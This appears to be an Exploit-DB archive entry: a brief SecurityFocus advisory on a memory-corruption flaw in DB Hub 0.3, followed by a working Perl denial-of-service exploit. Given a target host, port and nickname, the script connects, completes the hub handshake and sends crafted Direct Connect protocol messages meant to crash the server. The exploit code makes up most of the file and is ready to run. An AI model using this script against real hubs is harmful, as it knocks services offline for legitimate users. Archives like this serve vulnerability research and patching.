exploit-db-mirror/exploits/multiple/dos/29362.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

45 lines
No EOL
1.5 KiB
Perl
Executable file

source: https://www.securityfocus.com/bid/21791/info
A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic.
An attacker may exploit this issue to crash affected applications, denying service to legitimate users.
DB Hub version 0.3 is vulnerable to this issue; other versions may also be affected.
#!/usr/bin/perl
# DB Hub (http://dbhub.ir.pl/) DoS exploit
# Critical Security (http://www.critical.lt)
use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $nick = $ARGV[2];
print q(
----------------------------------------------
| DB Hub (http://dbhub.ir.pl/) DoS exploit |
----------------------------------------------
);
if (@ARGV < 3) {
print "Usage: perl crit_dbhub.pl host port nick\n";
exit();
}
if ($connect = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => tcp,
Timeout => 5 )
or die "[-] Can't connect\n")
{
print "[+] Connected!\n";
}
$res = $connect->recv($text,200);
if ($text = ~/Lock/) { $connect->send("\$Key vistiek_netikrina|\$ValidateNick $nick|"); }
$connect->send("\$Version 20|\$MyINFO \$ALL $nick <++ V:0.674,M:A,H:1/0/0,S:11>\$ \$DSL.\$\$19313847685\$|\$GetNickList|");
$connect->send("<$nick>!|"); # xixi
print "[+] Data sent\n";
while($text) { $res = $connect->recv($text,200); }
print "[+] Done\n";